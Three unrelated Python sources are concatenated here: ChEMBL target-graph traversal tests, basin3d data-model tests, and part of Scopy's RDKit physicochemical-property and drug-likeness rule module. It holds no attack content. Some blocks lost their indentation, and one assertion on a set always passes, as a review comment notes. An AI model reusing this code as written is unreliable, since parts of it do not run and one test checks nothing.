            TargetRelType.subset_of,
            TargetType.protein_complex,
            None,
        )

    def test_traverse_gabaa_up_mouse_2(self):
        """Same traversal but allowing OVERLAPS WITH: the dead end disappears."""
        # this is about the same, but now we'll allow that OVERLAPS WITH rel
        # so we won't find them here
        target = factory.find("CHEMBL3139")
        assert target.chembl == "CHEMBL3139"
        link_types = TargetEdgeReqs.cross(
            TargetType.protein_types(),
            {TargetRelType.subset_of},
            TargetType.protein_types(),
        )
        link_types.add(
            TargetEdgeReqs(
                TargetType.protein_complex,
                None,
                TargetRelType.overlaps_with,
                TargetType.protein_complex_group,
                None,
            )
        )
        accepted = graph_factory.at_target(target).traverse(link_types)
        vals: Mapping[str, TargetNode] = {a.target.chembl: a for a in accepted}
        assert {t.target.chembl for t in accepted} == {
            "CHEMBL2094133",
            "CHEMBL3139",
            "CHEMBL4296058",
            "CHEMBL4296059",
        }
        assert not vals["CHEMBL3139"].is_end
        assert vals["CHEMBL2094133"].is_end
        assert not vals["CHEMBL4296058"].is_end
        # here's the difference:
        # by adding the OVERLAPS WITH rel, it now knows it's not at the end
        assert not vals["CHEMBL4296059"].is_end
        assert vals["CHEMBL3139"].depth == 0
        assert vals["CHEMBL2094133"].depth == 1 # breadth-first!
        assert vals["CHEMBL2094133"].depth == 1
        assert vals["CHEMBL4296058"].depth == 1
        assert vals["CHEMBL3139"].link_reqs is None
        assert vals["CHEMBL2094133"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
            TargetRelType.subset_of,
            TargetType.protein_complex_group,
            None,
        )
        assert vals["CHEMBL4296058"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
            TargetRelType.subset_of,
            TargetType.protein_complex,
            None,
        )
        assert vals["CHEMBL4296059"].link_reqs == TargetEdgeReqs(
            TargetType.single_protein,
            None,
            TargetRelType.subset_of,
            TargetType.protein_complex,
            None,
        )

    def test_traverse_gabaa_up_and_down(self):
        """Bidirectional traversal covers the whole GABA-A neighbourhood."""
        target = factory.find("CHEMBL2109243")
        link_types = TargetEdgeReqs.cross(
            TargetType.protein_types(),
            {TargetRelType.subset_of, TargetRelType.superset_of},
            TargetType.protein_types(),
        )
        accepted = graph_factory.at_target(target).traverse(link_types)
        # based on the docs I wrote, originally by looking thru the search results
        assert len(accepted) > 40
        assert len(accepted) < 60
        # NOTE(review): a non-empty set is always truthy — this passes even if
        # no name contains "GABA"; likely meant all(...) instead of a set.
        assert {"GABA" in t.target.name.upper() for t in accepted}
if __name__ == "__main__":
pytest.main()
|
<gh_stars>1-10
import pytest
from basin3d.core.models import AbsoluteCoordinate, AltitudeCoordinate, Coordinate, DepthCoordinate, \
GeographicCoordinate, MeasurementTimeseriesTVPObservation, MonitoringFeature, Observation, ObservedProperty, \
ObservedPropertyVariable, RelatedSamplingFeature, RepresentativeCoordinate, ResultQuality, TimeValuePair, \
VerticalCoordinate, DataSource
from basin3d.core.types import FeatureTypes, SamplingMedium, SpatialSamplingShapes
@pytest.fixture
def observed_property_var():
    """
    Load some fake data to use in the tests
    """
    variable = ObservedPropertyVariable(
        basin3d_id='FH2O',
        full_name='Groundwater Flux',
        categories=['Hydrology', 'Subsurface'],
        units='m3/m/s',
    )
    return variable
@pytest.fixture
def observed_property(datasource, observed_property_var):
    """Fixture: a fake 'water_flux' ObservedProperty bound to the test datasource."""
    prop = ObservedProperty(
        datasource_variable='water_flux',
        observed_property_variable=observed_property_var,
        sampling_medium=SamplingMedium.WATER,
        datasource=datasource,
        datasource_description='a test variable',
    )
    return prop
def test_data_source_model(datasource):
    """Test DataSource model"""
    expected = {
        'id': 'Alpha',
        'name': 'Alpha',
        'id_prefix': 'A',
        'location': 'https://asource.foo/',
    }
    for attr, value in expected.items():
        assert getattr(datasource, attr) == value
def test_observed_property_create(observed_property, observed_property_var, datasource):
    """ Was the object created correctly? """
    actual = (
        observed_property.sampling_medium,
        observed_property.datasource_variable,
        observed_property.observed_property_variable,
        observed_property.datasource,
        observed_property.datasource_description,
    )
    assert actual == (SamplingMedium.WATER, 'water_flux', observed_property_var,
                      datasource, 'a test variable')
def test_observed_property_variable_create(observed_property_var):
    """ create the object and test attributes """
    expected = {
        'basin3d_id': 'FH2O',
        'full_name': 'Groundwater Flux',
        'categories': ['Hydrology', 'Subsurface'],
        'units': 'm3/m/s',
    }
    for attr, value in expected.items():
        assert getattr(observed_property_var, attr) == value
def test_representative_coordinate():
    """Test a Representative Coordinate"""
    # Build a representative point from a geographic (lat/long) horizontal
    # position plus an altitude-based vertical extent.
    r_coord = RepresentativeCoordinate(
        representative_point=AbsoluteCoordinate(
            horizontal_position=GeographicCoordinate(
                units=GeographicCoordinate.UNITS_DEC_DEGREES,
                latitude=70.4657, longitude=-20.4567),
            vertical_extent=AltitudeCoordinate(
                datum=AltitudeCoordinate.DATUM_NAVD88,
                value=1500, distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
        representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)
    # vertical_extent and horizontal_position are exposed as sequences, hence [0].
    assert r_coord.representative_point.vertical_extent[0].datum == AltitudeCoordinate.DATUM_NAVD88
    assert r_coord.representative_point.vertical_extent[0].value == 1500
    assert r_coord.representative_point.vertical_extent[0].distance_units == VerticalCoordinate.DISTANCE_UNITS_FEET
    # x/y are aliases for longitude/latitude, verified against the same values.
    assert r_coord.representative_point.horizontal_position[0].longitude == -20.4567
    assert r_coord.representative_point.horizontal_position[0].x == -20.4567
    assert r_coord.representative_point.horizontal_position[0].y == 70.4657
    assert r_coord.representative_point.horizontal_position[0].latitude == 70.4657
    assert r_coord.representative_point.horizontal_position[0].units == GeographicCoordinate.UNITS_DEC_DEGREES
    assert r_coord.representative_point_type == RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE
def test_related_sampling_feature(plugin_access_alpha):
    """Test a Related Sampling feature"""
    related_sampling_feature = RelatedSamplingFeature(plugin_access=plugin_access_alpha,
                                                      related_sampling_feature='Region1',
                                                      related_sampling_feature_type=FeatureTypes.REGION,
                                                      role=RelatedSamplingFeature.ROLE_PARENT)
    # The datasource comes from the plugin access object, and the raw id
    # 'Region1' is prefixed with the datasource id_prefix, yielding 'A-Region1'.
    assert related_sampling_feature.datasource == plugin_access_alpha.datasource
    assert related_sampling_feature.related_sampling_feature == 'A-Region1'
    assert related_sampling_feature.related_sampling_feature_type == FeatureTypes.REGION
    assert related_sampling_feature.role == RelatedSamplingFeature.ROLE_PARENT
def test_absolute_coordinate():
    """An AltitudeCoordinate keeps the datum, value and units it was built with."""
    coord = AltitudeCoordinate(datum=AltitudeCoordinate.DATUM_NAVD88,
                               value=1500,
                               distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)
    assert coord.value == 1500
    assert coord.datum == AltitudeCoordinate.DATUM_NAVD88
    assert coord.distance_units == VerticalCoordinate.DISTANCE_UNITS_FEET
def test_monitoring_feature_create(plugin_access_alpha):
    """Test instance of monitoring feature"""
    # --- Case 1: a REGION feature described only by a representative coordinate.
    a_region = MonitoringFeature(
        plugin_access=plugin_access_alpha,
        id="Region1",
        name="AwesomeRegion",
        description="This region is really awesome.",
        feature_type=FeatureTypes.REGION,
        shape=SpatialSamplingShapes.SHAPE_SURFACE,
        coordinates=Coordinate(representative=RepresentativeCoordinate(
            representative_point=AbsoluteCoordinate(
                horizontal_position=GeographicCoordinate(
                    units=GeographicCoordinate.UNITS_DEC_DEGREES,
                    latitude=70.4657, longitude=-20.4567),
                vertical_extent=AltitudeCoordinate(
                    datum=AltitudeCoordinate.DATUM_NAVD88,
                    value=1500, distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
            representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)
        )
    )
    # The id is prefixed with the datasource id_prefix ('A'), giving 'A-Region1'.
    assert a_region.datasource.id == 'Alpha'
    assert a_region.id == 'A-Region1'
    assert a_region.name == 'AwesomeRegion'
    assert a_region.feature_type == FeatureTypes.REGION
    assert a_region.description == 'This region is really awesome.'
    assert a_region.shape == SpatialSamplingShapes.SHAPE_SURFACE
    assert a_region.coordinates.representative.representative_point.horizontal_position[0].units == \
        GeographicCoordinate.UNITS_DEC_DEGREES
    assert a_region.coordinates.representative.representative_point.horizontal_position[0].latitude == 70.4657
    assert a_region.coordinates.representative.representative_point.horizontal_position[0].longitude == -20.4567
    assert a_region.coordinates.representative.representative_point.vertical_extent[0].datum == \
        AltitudeCoordinate.DATUM_NAVD88
    assert a_region.coordinates.representative.representative_point.vertical_extent[0].value == 1500
    assert a_region.coordinates.representative.representative_point.vertical_extent[0].distance_units == \
        VerticalCoordinate.DISTANCE_UNITS_FEET
    assert a_region.coordinates.representative.representative_point_type == \
        RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE
    # --- Case 2: a POINT feature with both an absolute coordinate and a
    # representative depth, plus observed variables and a parent region.
    a_point = MonitoringFeature(
        plugin_access=plugin_access_alpha,
        id='1',
        name='Point Location 1',
        description='The first point.',
        feature_type=FeatureTypes.POINT,
        shape=SpatialSamplingShapes.SHAPE_POINT,
        coordinates=Coordinate(
            absolute=AbsoluteCoordinate(
                horizontal_position=GeographicCoordinate(
                    units=GeographicCoordinate.UNITS_DEC_DEGREES,
                    latitude=70.4657, longitude=-20.4567),
                vertical_extent=AltitudeCoordinate(
                    datum=AltitudeCoordinate.DATUM_NAVD88,
                    value=1500,
                    distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
            representative=RepresentativeCoordinate(
                vertical_position=DepthCoordinate(
                    datum=DepthCoordinate.DATUM_LOCAL_SURFACE,
                    value=-0.5, distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)
            )
        ),
        observed_property_variables=['Ag', 'Acetate'],
        related_sampling_feature_complex=[
            RelatedSamplingFeature(plugin_access=plugin_access_alpha,
                                   related_sampling_feature='Region1',
                                   related_sampling_feature_type=FeatureTypes.REGION,
                                   role=RelatedSamplingFeature.ROLE_PARENT)]
    )
    assert a_point.datasource.id == 'Alpha'
    assert a_point.id == 'A-1'
    assert a_point.name == 'Point Location 1'
    assert a_point.feature_type == FeatureTypes.POINT
    assert a_point.description == 'The first point.'
    assert a_point.shape == SpatialSamplingShapes.SHAPE_POINT
    assert a_point.coordinates.absolute.horizontal_position[0].units == \
        GeographicCoordinate.UNITS_DEC_DEGREES
    assert a_point.coordinates.absolute.horizontal_position[0].latitude == 70.4657
    assert a_point.coordinates.absolute.horizontal_position[0].longitude == -20.4567
    assert a_point.coordinates.absolute.vertical_extent[0].datum == \
        AltitudeCoordinate.DATUM_NAVD88
    assert a_point.coordinates.absolute.vertical_extent[0].value == 1500
    assert a_point.coordinates.absolute.vertical_extent[0].distance_units == \
        VerticalCoordinate.DISTANCE_UNITS_FEET
    assert a_point.coordinates.representative.vertical_position.value == -0.5
    assert a_point.coordinates.representative.vertical_position.distance_units == \
        VerticalCoordinate.DISTANCE_UNITS_METERS
    assert a_point.coordinates.representative.vertical_position.datum == \
        DepthCoordinate.DATUM_LOCAL_SURFACE
    # NOTE(review): inputs were ['Ag', 'Acetate'] but the model apparently maps
    # them to basin3d ids ('Acetate' -> 'ACT') and reorders -- confirm intended.
    assert a_point.observed_property_variables == ['ACT', 'Ag']
    assert a_point.related_sampling_feature_complex[0].related_sampling_feature == 'A-Region1'
    assert a_point.related_sampling_feature_complex[0].role == 'PARENT'
def test_observation_create(plugin_access_alpha):
    """
    Test instance of observation model class
    NOTE: In practice, the Observation should not be used stand alone
    """
    obs01 = Observation(
        plugin_access=plugin_access_alpha,
        id='timeseries01',
        utc_offset='9',
        phenomenon_time='20180201',
        result_quality=ResultQuality().RESULT_QUALITY_CHECKED,
        feature_of_interest='Point011')
    # The id is prefixed with the datasource id_prefix ('A-'); observed_property
    # stays None because none was supplied to the constructor.
    assert obs01.datasource.id == 'Alpha'
    assert obs01.id == 'A-timeseries01'
    assert obs01.utc_offset == '9'
    assert obs01.phenomenon_time == '20180201'
    assert obs01.observed_property is None
    assert obs01.result_quality == ResultQuality().RESULT_QUALITY_CHECKED
    assert obs01.feature_of_interest == 'Point011'
def test_measurement_timeseries_tvp_observation_create(plugin_access_alpha):
    """Test instance of Measurement Timeseries TVP Observation"""
    obs01 = MeasurementTimeseriesTVPObservation(
        plugin_access=plugin_access_alpha,
        id='timeseries01',
        utc_offset='9',
        phenomenon_time='20180201',
        result_quality=ResultQuality().RESULT_QUALITY_CHECKED,
        feature_of_interest='Point011',
        feature_of_interest_type=FeatureTypes.POINT,
        aggregation_duration='daily',
        time_reference_position='start',
        observed_property_variable='Acetate',
        statistic='mean',
        result_points=[TimeValuePair('201802030100', '5.32')],
        unit_of_measurement='m'
    )
    assert obs01.id == 'A-timeseries01'
    assert obs01.utc_offset == '9'
    assert obs01.phenomenon_time == '20180201'
    # The datasource variable 'Acetate' is resolved into a full ObservedProperty
    # with basin3d id 'ACT' (compared structurally below).
    assert obs01.observed_property == ObservedProperty(
        datasource_variable='Acetate',
        observed_property_variable=ObservedPropertyVariable(
            basin3d_id='ACT', full_name='Acetate (CH3COO)',
            categories=['Biogeochemistry', 'Anions'], units='mM'),
        sampling_medium=SamplingMedium.WATER,
        datasource=DataSource(
            id='Alpha', name='Alpha', id_prefix='A',
            location='https://asource.foo/', credentials={}),
        datasource_description='')
    assert obs01.observed_property_variable == 'ACT'
    # NOTE(review): accessed as a class attribute here but via an instance
    # (ResultQuality()) above -- both work; presumably a plain constant.
    assert obs01.result_quality == ResultQuality.RESULT_QUALITY_CHECKED
    assert obs01.feature_of_interest == 'Point011'
    assert obs01.feature_of_interest_type == FeatureTypes.POINT
    assert obs01.aggregation_duration == 'daily'
    assert obs01.time_reference_position == 'start'
    assert obs01.statistic == 'mean'
    assert obs01.unit_of_measurement == 'm'
    assert obs01.datasource.id == 'Alpha'
|
<reponame>SorchaYang/Scopy
# -*- coding: utf-8 -*-
#Created on Mon Jul 8 10:03:32 2019
#
#@Author: <NAME>, <NAME>
#@Institution: CBDD Group, Xiangya School of Pharmaceutical Science, CSU, China,
#@Homepage: http://www.scbdd.com
#@Mail: <EMAIL>; <EMAIL>
#@Blog: https://blog.moyule.me
from multiprocessing import Pool
from functools import partial
from rdkit import Chem
try:
from . import rulesfilter
from . import molproperty
except:
import rulesfilter
import molproperty
def _GetSmi(mol):
    """
    Return the SMILES string of a molecule.

    :param mol: molecule
    :type mol: rdkit.Chem.rdchem.Mol
    :return: the SMILES of the molecule
    :rtype: string
    """
    smiles = Chem.MolToSmiles(mol)
    return smiles
class PC_properties(object):
    """
    Compute the whole set of physicochemical properties provided by module
    molproperty.  Each public method farms the corresponding molproperty
    function out over a multiprocessing Pool and returns one value per molecule.

    :param mols: The molecules to be scanned.
    :type mols: Iterable object, each element is rdkit.Chem.rdchem.Mol
    :param n_jobs: The number of CPUs to use to do the computation, defaults to 1
    :type n_jobs: int, optional
    """

    def __init__(self, mols, n_jobs=1):
        self.mols = list(mols)
        # Pool(None) means "use all available CPUs", so any n_jobs < 1 maps to None.
        self.n_jobs = n_jobs if n_jobs >= 1 else None

    def _pool_map(self, func):
        """Apply *func* to every molecule in a multiprocessing Pool; return a list.

        Factors out the Pool boilerplate that was previously duplicated in
        every Calculate* method.
        """
        pool = Pool(self.n_jobs)
        res = pool.map_async(func, self.mols).get()
        pool.close()
        pool.join()
        return res

    def CalculateMolWeight(self):
        """Molecular weight, hydrogen atoms included ---> MW; one float per molecule."""
        return self._pool_map(molproperty.CalculateMolWeight)

    def CalculateNumBonds(self):
        """Number of bonds between heavy atoms ---> nBond; list of int."""
        return self._pool_map(molproperty.CalculateNumBonds)

    def CalculateNumAtoms(self):
        """Number of atoms, hydrogen atoms included ---> nAtom; list of int."""
        return self._pool_map(molproperty.CalculateNumAtoms)

    def CalculateNumHetero(self):
        """Number of heteroatoms ---> nHet; list of int."""
        return self._pool_map(molproperty.CalculateNumHetero)

    def CalculateNumRotatableBonds(self):
        """Number of rotatable bonds ---> nRot; list of int.

        Note: amide C-N bonds may be excluded because of their high
        rotational energy barrier (see molproperty.CalculateNumRotatableBonds).
        """
        return self._pool_map(molproperty.CalculateNumRotatableBonds)

    def CalculateNumRigidBonds(self):
        """Number of non-flexible bonds (opposite of rotatable) ---> nRig; list of int."""
        return self._pool_map(molproperty.CalculateNumRigidBonds)

    def CalculateFlexibility(self):
        """Flexibility: ratio between rotatable and rigid bonds ---> Flex; list."""
        return self._pool_map(molproperty.CalculateFlexibility)

    def CalculateNumRing(self):
        """Number of rings ---> nRing; list of int."""
        return self._pool_map(molproperty.CalculateNumRing)

    def CalculateNumHeavyAtom(self):
        """Number of heavy atoms ---> nHev; list of int."""
        return self._pool_map(molproperty.CalculateNumHeavyAtom)

    def CalculateLogD(self):
        """
        Molecular logD under pH=7.4 ---> logD; list of float.

        Predicted by a linear model (fixed intercept + Ghose-Crippen fragment
        contributions read from ScoConfig.CrippenDir/Crippen.txt).
        """
        import sys
        import os
        import csv
        try:
            from .. import ScoConfig
        except ImportError:
            sys.path.append('..')
            import ScoConfig
        try:
            from ..fingerprint.fingerprints import CalculateGhoseCrippen
        except ImportError:
            sys.path.append('..')
            from fingerprint.fingerprints import CalculateGhoseCrippen
        intercept = 0.5748907159915493
        fps = CalculateGhoseCrippen(self.mols, self.n_jobs)
        # os.path.join is portable; the original '\\Crippen.txt' only worked on Windows.
        with open(os.path.join(ScoConfig.CrippenDir, 'Crippen.txt')) as f_obj:
            lines = csv.reader(f_obj, delimiter='\t')
            next(lines)  # skip the header row
            contri = [float(x[-1]) for x in lines]
        # fps is a fingerprint matrix; dot with the contribution vector per molecule.
        logD = (fps * contri).sum(axis=1) + intercept
        return list(logD)

    def CalculateLogP(self):
        """Molecular logP ---> logP; list of float."""
        return self._pool_map(molproperty.CalculateLogP)

    def CheckAcid(self):
        """
        Classify each molecule as acid or base via SMARTS ---> ab; list.

        SMARTS retrieved from
        https://www.daylight.com/dayhtml_tutorials/languages/smarts/smarts_examples.html
        """
        return self._pool_map(molproperty.CheckAcid)

    def CalculatepKa(self):
        """
        *This function should be revised*
        Estimate pKa from the relation between logD and logP at pH 7.4 ---> pKa.

        Eq.: abs(pH-pKa) = log10(10^(logP-logD)-1)
             pKa = pH - log10(10^(logP-logD)-1) for acid
             pKa = log10(10^(logP-logD)-1) - pH for base

        :return: one pKa per molecule; 'N/A' when the equation has no solution
        :rtype: list
        """
        import warnings
        warnings.filterwarnings('ignore')
        from math import log10
        logDl = self.CalculateLogD()
        logPl = self.CalculateLogP()
        statusl = self.CheckAcid()
        res = []
        for status, logP, logD in zip(statusl, logPl, logDl):
            try:
                delta = log10(10 ** (logP - logD) - 1)
                res.append(7.4 - delta if status == 'acid' else delta - 7.4)
            except (ValueError, OverflowError, ZeroDivisionError):
                # log10 of a non-positive number (logP <= logD) has no estimate;
                # the original bare `except` is narrowed to the math failures.
                res.append('N/A')
        return res

    def CalculateMolMR(self):
        """Molecular refraction value (Crippen method) ---> MR; list of float."""
        return self._pool_map(molproperty.CalculateMolMR)

    def CalculateNumHDonors(self):
        """Number of hydrogen bond donors ---> nHD; list of int."""
        return self._pool_map(molproperty.CalculateNumHDonors)

    def CalculateNumHAcceptors(self):
        """Number of hydrogen bond acceptors ---> nHA; list of int."""
        return self._pool_map(molproperty.CalculateNumHAcceptors)

    def CalculateNumHyBond(self):
        """Sum of hydrogen bond donors and acceptors ---> nHB; list of int."""
        return self._pool_map(molproperty.CalculateNumHyBond)

    def CalculateAromaticProportion(self):
        """Proportion of heavy atoms in an aromatic ring ---> AP; list of float."""
        return self._pool_map(molproperty.CalculateAromaticProportion)

    def CalculateLogSw(self):
        """
        Logarithm of water solubility via the ESOL method ---> logSw; list of float.

        Equation: Log(Sw) = 0.16 - 0.638*clogP - 0.0062*MWT + 0.066*RB - 0.74*AP
        Reference: https://pubs.acs.org/doi/abs/10.1021/ci034243x
        """
        return self._pool_map(molproperty.CalculateLogSw)

    def CalculateFsp3(self):
        """Carbon bond saturation: sp3 carbons / total carbons ---> FSP3; list of float."""
        return self._pool_map(molproperty.CalculateFsp3)

    def CalculateTPSA(self):
        """Topological polar surface area ---> TPSA; list of float."""
        return self._pool_map(molproperty.CalculateTPSA)

    def CalculateQEDmean(self):
        """
        QED drug-likeness using average descriptor weights ---> QEDmean; list.

        Reference: https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
        """
        return self._pool_map(molproperty.CalculateQEDmean)

    def CalculateQEDmax(self):
        """
        QED drug-likeness using maximal descriptor weights ---> QEDmax; list.

        Reference: https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
        """
        return self._pool_map(molproperty.CalculateQEDmax)

    def CalculateQEDnone(self):
        """
        QED drug-likeness using unit weights ---> QEDnone; list.

        Reference: https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
        """
        return self._pool_map(molproperty.CalculateQEDnone)

    def CalculateMaxSizeSystemRing(self):
        """Number of atoms in the biggest ring system ---> maxring; list of int."""
        return self._pool_map(molproperty.CalculateMaxSizeSystemRing)

    def CalculateNumStereocenters(self):
        """
        Number of stereo centers ---> nStereo; list of int.

        *This cannot be run under multiprocessing*, so a plain map is used.
        """
        return list(map(molproperty.CalculateNumStereocenters, self.mols))

    def CalculateNumCarbon(self):
        """Number of carbon atoms ---> nC; list of int."""
        return self._pool_map(molproperty.CalculateNumCarbon)

    def CalculateNumBoron(self):
        """Number of boron atoms ---> nB; list of int."""
        return self._pool_map(molproperty.CalculateNumBoron)

    def CalculateNumFluorin(self):
        """Number of fluorine atoms ---> nF; list of int."""
        return self._pool_map(molproperty.CalculateNumFluorin)

    def CalculateNumChlorin(self):
        """Number of chlorine atoms ---> nCl; list of int."""
        return self._pool_map(molproperty.CalculateNumChlorin)

    def CalculateNumBromine(self):
        """Number of bromine atoms ---> nBr; list of int."""
        return self._pool_map(molproperty.CalculateNumBromine)

    def CalculateNumIodine(self):
        """Number of iodine atoms ---> nI; list of int.

        (The original docstring wrongly said "bromine atoms".)
        """
        return self._pool_map(molproperty.CalculateNumIodine)

    def CalculateNumPhosphor(self):
        """Number of phosphorus atoms ---> nP; list of int."""
        return self._pool_map(molproperty.CalculateNumPhosphor)

    def CalculateNumSulfur(self):
        """Number of sulfur atoms ---> nS; list of int."""
        return self._pool_map(molproperty.CalculateNumSulfur)

    def CalculateNumOxygen(self):
        """Number of oxygen atoms ---> nO; list of int."""
        return self._pool_map(molproperty.CalculateNumOxygen)

    def CalculateNumNitrogen(self):
        """Number of nitrogen atoms ---> nN; list of int."""
        return self._pool_map(molproperty.CalculateNumNitrogen)

    def CalculateNumChargedGroups(self):
        """Number of charged groups ---> nChar; NOT IMPLEMENTED (returns None)."""
        pass

    def CalculateHetCarbonRatio(self):
        """Ratio of non-carbon heavy atoms to carbon atoms ---> HetRatio; list."""
        return self._pool_map(molproperty.CalculateHetCarbonRatio)

    def CalculateSAscore(self):
        """
        Synthetic accessibility score ---> SAscore; list of float.

        Reference: https://jcheminf.biomedcentral.com/articles/10.1186/1758-2946-1-8
        """
        return self._pool_map(molproperty.CalculateSAscore)

    def CalculateNPscore(self):
        """
        Natural product-likeness score ---> NPscore; list of float.

        Reference: https://jcheminf.biomedcentral.com/articles/10.1186/1758-2946-1-8
        """
        return self._pool_map(molproperty.CalculateNPscore)

    def GetIFG(self):
        """
        Functional groups in organic molecules ---> IFG.

        :return: list of namedtuple('IFG', ['atomIds', 'atoms', 'type']) per molecule
        :rtype: list

        Reference: https://jcheminf.biomedcentral.com/articles/10.1186/s13321-017-0225-z
        """
        return self._pool_map(molproperty.GetIFG)

    def CalculateMolVolume(self):
        """
        Van der Waals volume ---> MV; list of float.

        Equation: VvdW = sum(atom contributions) - 5.92*NB (unit A^3),
        where NB is the total number of bonds.
        """
        return self._pool_map(molproperty.CalculateMolVolume)

    def CalculateMolDensity(self):
        """Molecular density ---> Dense; list of float."""
        return self._pool_map(molproperty.CalculateMolDensity)

    def CalculateMolFCharge(self):
        """Formal charge of the molecule ---> fChar; list."""
        return self._pool_map(molproperty.CalculateMolFCharge)

    def CalculateNumSinBond(self):
        """Number of single bonds ---> nSingle; list of int."""
        return self._pool_map(molproperty.CalculateNumSinBond)

    def CalculateNumDouBond(self):
        """Number of double bonds ---> nDouble; list of int."""
        return self._pool_map(molproperty.CalculateNumDouBond)

    def CalculateNumTriBond(self):
        """Number of triple bonds ---> nTriple; list of int."""
        return self._pool_map(molproperty.CalculateNumTriBond)

    def GetProperties(self,
                      items=['MW', 'Vol', 'Dense', 'fChar', 'nBond', 'nAtom', 'nHD', 'nHA', 'nHB',
                             'nHet', 'nStero', 'nHev', 'nRot', 'nRig', 'nRing',
                             'logP', 'logD', 'pKa', 'logSw', 'ab', 'MR', 'TPSA', 'AP', 'HetRatio',
                             'Fsp3', 'MaxRing', 'QEDmean', 'QEDmax', 'QEDnone', 'SAscore', 'NPscore',
                             'nSingle', 'nDouble', 'nTriple', 'nC', 'nB', 'nF', 'nCl', 'nBr', 'nI',
                             'nP', 'nS', 'nO', 'nN'
                             ],
                      showSMILES=False):
        """
        Get all PC-properties in scopy.

        :param items: property tags to compute (see the dispatch table below)
        :type items: Iterable of str
        :param showSMILES: also include a 'SMILES' entry, defaults to False
        :type showSMILES: bool, optional
        :return: mapping of tag -> list of per-molecule values
        :rtype: dict
        """
        # Dispatch table of bound methods.  This replaces the original
        # eval('self....()') string dispatch, which was both slower and unsafe.
        funcl = {'MW': self.CalculateMolWeight,
                 'Vol': self.CalculateMolVolume,
                 'Dense': self.CalculateMolDensity,
                 'fChar': self.CalculateMolFCharge,
                 'nBond': self.CalculateNumBonds,
                 'nAtom': self.CalculateNumAtoms,
                 'nHet': self.CalculateNumHetero,
                 'nRot': self.CalculateNumRotatableBonds,
                 'nRig': self.CalculateNumRigidBonds,
                 'nRing': self.CalculateNumRing,
                 'nHev': self.CalculateNumHeavyAtom,
                 'logP': self.CalculateLogP,
                 'logD': self.CalculateLogD,
                 'pKa': self.CalculatepKa,
                 'ab': self.CheckAcid,
                 'MR': self.CalculateMolMR,
                 'nHD': self.CalculateNumHDonors,
                 'nHA': self.CalculateNumHAcceptors,
                 'nHB': self.CalculateNumHyBond,
                 'AP': self.CalculateAromaticProportion,
                 'logSw': self.CalculateLogSw,
                 'Fsp3': self.CalculateFsp3,
                 'TPSA': self.CalculateTPSA,
                 'MaxRing': self.CalculateMaxSizeSystemRing,
                 'nStero': self.CalculateNumStereocenters,
                 'HetRatio': self.CalculateHetCarbonRatio,
                 'QEDmean': self.CalculateQEDmean,
                 'QEDmax': self.CalculateQEDmax,
                 'QEDnone': self.CalculateQEDnone,
                 'SAscore': self.CalculateSAscore,
                 'NPscore': self.CalculateNPscore,
                 'nSingle': self.CalculateNumSinBond,
                 'nDouble': self.CalculateNumDouBond,
                 'nTriple': self.CalculateNumTriBond,
                 'nC': self.CalculateNumCarbon,
                 'nB': self.CalculateNumBoron,
                 'nF': self.CalculateNumFluorin,
                 'nCl': self.CalculateNumChlorin,
                 'nBr': self.CalculateNumBromine,
                 'nI': self.CalculateNumIodine,
                 'nP': self.CalculateNumPhosphor,
                 'nS': self.CalculateNumSulfur,
                 'nO': self.CalculateNumOxygen,
                 'nN': self.CalculateNumNitrogen}
        # Copy before any mutation: the original code did items.insert(0, 'SMILES')
        # directly on the parameter, permanently growing the shared mutable
        # default list on every showSMILES=True call.
        items = list(items)
        vals = [funcl[item]() for item in items]
        if showSMILES:
            smis = self._pool_map(_GetSmi)
            items.insert(0, 'SMILES')
            vals.insert(0, smis)
        return dict(zip(items, vals))
class PC_rules(object):
    """
    Scan molecules against physicochemical (PC) property-derived
    druglikeness rules implemented in ``rulesfilter``.

    :param mols: the molecules to be scanned.
    :type mols: Iterable object, each element is rdkit.Chem.rdchem.Mol
    :param n_jobs: The number of CPUs to use to do the computation,
        defaults to 1; any value < 1 means "use all available CPUs".
    :type n_jobs: int, optional
    :param detail: Control returning specific information or not, defaults to False
    :type detail: bool, optional
    :param showSMILES: Whether each result also carries the molecule's
        SMILES string, defaults to False
    :type showSMILES: bool, optional
    """

    def __init__(self, mols, n_jobs=1, detail=False, showSMILES=False):
        self.mols = mols
        self.detail = detail
        self.showSMILES = showSMILES
        # multiprocessing.Pool interprets None as os.cpu_count()
        self.n_jobs = n_jobs if n_jobs >= 1 else None

    def _scan(self, checker):
        """
        Apply one ``rulesfilter`` checker to every molecule in parallel.

        Shared implementation for all Check* methods below; the pool is
        always closed and joined, even if a checker raises.

        :param checker: a ``rulesfilter.Check*`` function accepting
            ``(mol, detail=..., showSMILES=...)``
        :return: one result per molecule, in input order
        :rtype: list
        """
        fn = partial(checker, detail=self.detail, showSMILES=self.showSMILES)
        pool = Pool(self.n_jobs)
        try:
            res = pool.map_async(fn, self.mols).get()
        finally:
            # Release worker processes deterministically.
            pool.close()
            pool.join()
        return res

    def CheckEganRule(self):
        """
        Bad or good oral bioavailability rule.
        Reference:
            Egan et al., J Med Chem, 43.21 (2000): 3867-3877.
        Rule details:
            0 <= TPSA <= 132
            -1 <= logP <= 6
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckEganRule)

    def CheckVeberRule(self):
        """
        Bad or good oral bioavailability rule.
        Reference:
            Veber et al., Journal of medicinal chemistry 45.12 (2002): 2615-2623.
        Rule details:
            nRot <= 10
            TPSA <= 140
            nHB <= 12
        :return: Result after scanning. If detail has been set to False, only return 'Disposed' and 'nViolate', otherwise extra returning each property
        :rtype: list
        """
        return self._scan(rulesfilter.CheckVeberRule)

